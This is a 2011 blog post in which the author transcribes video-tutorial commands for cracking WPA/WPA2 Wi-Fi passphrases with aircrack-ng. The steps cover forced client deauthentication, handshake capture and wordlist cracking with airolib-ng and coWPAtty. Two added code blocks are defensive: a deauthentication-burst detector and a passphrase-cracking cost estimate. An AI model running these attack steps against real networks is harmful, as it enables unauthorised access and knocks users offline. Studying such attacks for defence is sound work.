Sunday, August 14, 2011

Wireless WPA/WPA2 hacking not worth the trouble

This is part 2 of my side journey into wireless hacking. In my previous post (http://blog.workingsi.com/2011/08/playing-around-with-hacking-wep.html) I replicated what I saw in a YouTube video on hacking WiFi passwords from WEP. It worked and proved to be so easy it made me fear for my WEP network. However, the majority of networks these days are WPA or WPA2, so I'm going to try to hack my WPA home network next.

I'm using the backtrack-linux aircrack-ng toolset again, as I did in my previous post. See that post for how to put it on a USB stick and boot the computer into backtrack-linux. Not to worry: following hacking posts can often lead you into some dark corners of the internet, and this is not one of them. These tools are open source and can be downloaded into Ubuntu or used in backtrack. Of course I could be fooled too, but I don't see any way that this software could harm your computer or your files, since it never leaves your USB stick.

Once again I'm starting with a video tutorial: http://www.youtube.com/watch?v=T3iDWP2xeFw&feature=player_embedded#at=57 I don't know about you, but I'm no fan of video tutorials. You have to use the sound, can only view it on a real computer, have to start and stop it constantly because it goes too fast to type along, and you can't cut and paste anything. Not sure why people like it so much. I'm transcribing the commands here first.

  • airmon-ng
    • This command gives you back the system's name for your wireless adapter. Usually wlan0 on all my systems.
  • airodump-ng wlan0
    • scans for wireless networks and shows the BSSID, channel, and security type
    • copy out the BSSID MAC address string of the WPA network you want to crack, and record the channel.
  • airodump-ng -c [channel] -w [filename] --bssid [MAC address] wlan0
    • narrows down and scans just the network that you picked
    • filename is the file you create to store the information. The example uses "password"
    • The network is scanned and the data packet count goes up.
    • A station entry is a person (client) on the network that is talking to the network. You will need to copy out this MAC string as well.
    • leave it running
  • Open a second terminal window
  • aireplay-ng -0 5 -c (Station MAC) -a (BSSID MAC) wlan0
    • -0 is the mode, 5 is the number of attempts
    • The MACs are the numbers we got from the previous step
    • this apparently attempts to de-authenticate the targeted user from the network so they have to sign on again and resend their key. I don't know if the user would even be aware this happened to them
    • Go back to the other window and look for "WPA handshake"
  • ctrl-c the airodump-ng window
  • dir
    • Look for the password file you created just now; it will be the most recent and is called password-06.cap in this example
  • aircrack-ng password-06.cap -w /pentest/wireless/aircrack-ng/test/password.lst
    • password.lst is the password dictionary. Dictionaries are on the internet, and there is one included in the backtrack distro; the one in the distro is pretty small. http://www.outpost9.com/files/WordLists.html is recommended in the video
    • It begins actively testing; the list has 150,000 passwords
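The de-authentication step above is the only part of the procedure that is visible on the air, and it is the part a network owner can actually detect: a client that is knocked off the network "5 times" leaves a burst of deauthentication frames from the AP's address in any monitor-mode capture. The following is an added example (not from the original post or the aircrack-ng project) of a small detector that parses raw 802.11 management headers and raises an alert when one BSSID sees several deauth/disassoc frames within a short window. It assumes frames arrive as bare 802.11 MAC headers (radiotap stripped) and runs over a constructed sample capture, so it touches no radio.

```python
"""Flag deauthentication bursts in raw 802.11 management frames.

Added example, not from the original post. It assumes frames arrive as bare
802.11 MAC headers (a monitor-mode capture with the radiotap header stripped)
and uses constructed sample frames; nothing here touches a radio.
"""
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 0x0C     # type 0 (management), subtype 12
DISASSOC_SUBTYPE = 0x0A   # type 0 (management), subtype 10


def mac_str(addr: bytes) -> str:
    return ":".join(f"{b:02x}" for b in addr)


def mac_bytes(addr: str) -> bytes:
    return bytes(int(x, 16) for x in addr.split(":"))


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame.

    addr1 is the receiver, addr2 the transmitter, addr3 the BSSID. reason is
    the 16-bit reason code carried by deauth/disassoc frames, else None.
    Returns None for non-management or truncated frames.
    """
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]   # frame control, little-endian
    ftype = (fc >> 2) & 0x3                       # bits 2-3: frame type
    subtype = (fc >> 4) & 0xF                     # bits 4-7: subtype
    if ftype != 0:
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, mac_str(addr1), mac_str(addr2), mac_str(addr3), reason


class DeauthDetector:
    """Alert when a BSSID sees >= threshold deauth/disassoc frames in window_s seconds."""

    def __init__(self, window_s: float = 2.0, threshold: int = 3):
        self.window_s = window_s
        self.threshold = threshold
        self._seen = defaultdict(deque)   # bssid -> timestamps of recent deauths

    def observe(self, ts: float, frame: bytes):
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            return None
        subtype, addr1, _addr2, bssid, reason = parsed
        if subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            return None
        window = self._seen[bssid]
        window.append(ts)
        while window and ts - window[0] > self.window_s:   # drop stale entries
            window.popleft()
        if len(window) >= self.threshold:
            return {"ts": ts, "bssid": bssid, "target": addr1,
                    "count": len(window), "reason": reason}
        return None


# Constructed sample capture (not real traffic): one beacon, then five deauths
# aimed at one client, the pattern five forced de-authentications would leave.
AP = "00:11:22:33:44:55"        # constructed BSSID
CLIENT = "66:77:88:99:aa:bb"    # constructed station address


def sample_deauth(bssid: str, client: str, reason: int = 7) -> bytes:
    """In-memory deauth frame: FC 0xC0, duration, addr1..3, seq ctrl, reason code."""
    return (b"\xc0\x00" + b"\x00\x00" + mac_bytes(client) + mac_bytes(bssid)
            + mac_bytes(bssid) + b"\x00\x00" + struct.pack("<H", reason))


SAMPLE_BEACON = (b"\x80\x00" + b"\x00\x00" + mac_bytes("ff:ff:ff:ff:ff:ff")
                 + mac_bytes(AP) + mac_bytes(AP) + b"\x00\x00")

SAMPLE_CAPTURE = [(0.0, SAMPLE_BEACON)] + [
    (1.0 + 0.1 * i, sample_deauth(AP, CLIENT)) for i in range(5)
]


def run_sample():
    """Replay the constructed capture; return the list of alerts raised."""
    det = DeauthDetector(window_s=2.0, threshold=3)
    alerts = []
    for ts, frame in SAMPLE_CAPTURE:
        alert = det.observe(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_sample():
        print(f"t={a['ts']:.1f}s deauth burst from {a['bssid']} -> {a['target']} "
              f"({a['count']} in window, reason={a['reason']})")
```

On the sample capture the third, fourth and fifth deauth frames each trip the threshold, so the first alert fires about 0.2 s into the burst. The threshold and window are deliberately loose: a single deauth is normal when a client roams or an AP reboots, a run of them against one station inside two seconds is not. The lasting fix for the underlying weakness is 802.11w protected management frames, which authenticate deauth/disassoc frames so a forged one is discarded.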

This is a bit less easy than WEP, because it needs a big password file, and if the password for the network isn't in the file, it will never crack it.
Also it looks like it doesn't work on WPA2.

Another video that seems to cover WPA2 PSK is here:
http://www.youtube.com/watch?v=wl4SZ6D9FY0&feature=related
It uses "coWPAtty" to crack the password, which is already kind of old.
  • airmon-ng
    • capture the essid, mac, client mac, channel, WPA2-PSK
  • airodump-ng --channel 8 --write output --bssid [mac] wlan0
    • dumps only the network you chose
  • aireplay-ng --deauth 1 -a [mac] -c [client mac] wlan0
    • again this deauthorizes a client in order to capture them logging back in and sending the password
  • aircrack-ng output-01.cap -w /root/tools/dictionaries/g0tmilk.lst
    • output-01.cap is the file you created during the second step
    • not sure where the password file came from that is magically entered
    • video finds the password in a second.  hmmmm
  • airolib-ng crackwpa --import passwd /root/tools/dictionaries/gotmilk.lst
    • no idea what this step does
    • seems to be just adding the new password to the library
  • airolib-ng crackwpa --import essid [mac]
  • airolib-ng crackwpa --stats
  • airolib-ng crackwpa --clean all
  • airolib-ng crackwpa --batch
  • airolib-ng crackwpa --verify all
  • aircrack-ng -r crackwpa output-01.cap
  • cowpatty -s gotmilk -r /root/output-01.cap -f /root/tools/dictionaries/getmilk.lst
  • genpmk -f /root/tools/dictionaries/gotmilk.lst -d output -hash -s gotmilk
  • blah blah blah, it goes on for dozens more commands
    • sorry, I grew bored of transcribing all the commands
    • It looks like this is an exercise in brute force calculating the password against the hash.

I'm going to bail on this effort. I don't really have a need to hack WPA or WPA2, and I read enough about it to know how it's done. The interesting part was the de-authentication trick to capture the password being sent. After that it is plain old password decryption. If somebody wanted to take a long time and a concerted effort, they could crack a nearby permanent network from their neighbor, school, etc. If your evil goal was to get a little free WiFi as you travel around town, this would be useless. It takes too long. My motivation wanes. My WPA2 password is so long and complicated, my network is safe. :-)
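Whether "so long and complicated" actually makes the network safe comes down to arithmetic, and the "brute force against the hash" step noted above is where the cost lives: every guess has to be run through the same derivation the access point uses to turn a passphrase into a key. The following is an added example (not from the original post or from the aircrack-ng/coWPAtty projects) that implements that derivation, which is the same for WPA-PSK and WPA2-PSK: PBKDF2-HMAC-SHA1 with 4096 rounds, the SSID as salt and a 256-bit result, per 802.11i. It benchmarks the derivation on the local host and turns the rate into time-to-exhaust estimates for the post's 150,000-word list and for random passphrases of a few lengths; the SSID "example", the guess strings and the rate are constructed on this machine, not figures from the post.

```python
"""Estimate what exhausting a passphrase space costs an offline WPA/WPA2-PSK guesser.

Added example, not from the original post. The derivation is the 802.11i
PSK-to-PMK mapping (PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output, SSID as
salt), which is what each dictionary guess has to compute and what the
genpmk/airolib-ng precomputation steps store per SSID. The 150,000-word figure
is the post's; the guess rate comes from a local benchmark on this machine.
"""
import hashlib
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise master key for a PSK network; identical for WPA and WPA2-PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def benchmark_pmk_rate(ssid: str = "example", samples: int = 20) -> float:
    """Single-threaded PMKs per second on this host (rough, for the estimate)."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"guess{i:08d}", ssid)      # constructed guess strings
    return samples / (time.perf_counter() - t0)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct passphrases of the given length over the alphabet."""
    return alphabet_size ** length


def seconds_to_exhaust(candidates: float, rate: float) -> float:
    """Worst-case time to try every candidate at the given guesses/second."""
    return candidates / rate


def human_duration(seconds: float) -> str:
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


def estimate_table(rate: float):
    """Return (label, candidates, seconds) rows for a wordlist and random passphrases."""
    rows = [("150,000-word list", 150_000)]
    for length in (8, 12, 20):
        rows.append((f"random lowercase, {length} chars", keyspace(26, length)))
        rows.append((f"random printable ASCII, {length} chars", keyspace(95, length)))
    return [(label, n, seconds_to_exhaust(n, rate)) for label, n in rows]


if __name__ == "__main__":
    rate = benchmark_pmk_rate()
    print(f"this host: ~{rate:,.0f} PMK derivations/second (one core, Python)")
    for label, n, secs in estimate_table(rate):
        print(f"{label:40s} {n:>28,d} candidates  {human_duration(secs)}")
```

Two things fall out of the numbers. A wordlist of 150,000 entries is exhausted in minutes on one core, so a passphrase that appears in any list is gone regardless of WPA or WPA2; a random 20-character passphrase is not reachable even at GPU or cluster rates several orders of magnitude above this benchmark. And because the SSID is the salt, the precomputed tables that genpmk and airolib-ng build are only reusable against networks that share an SSID, which is the practical reason to give a network a unique SSID rather than a vendor default.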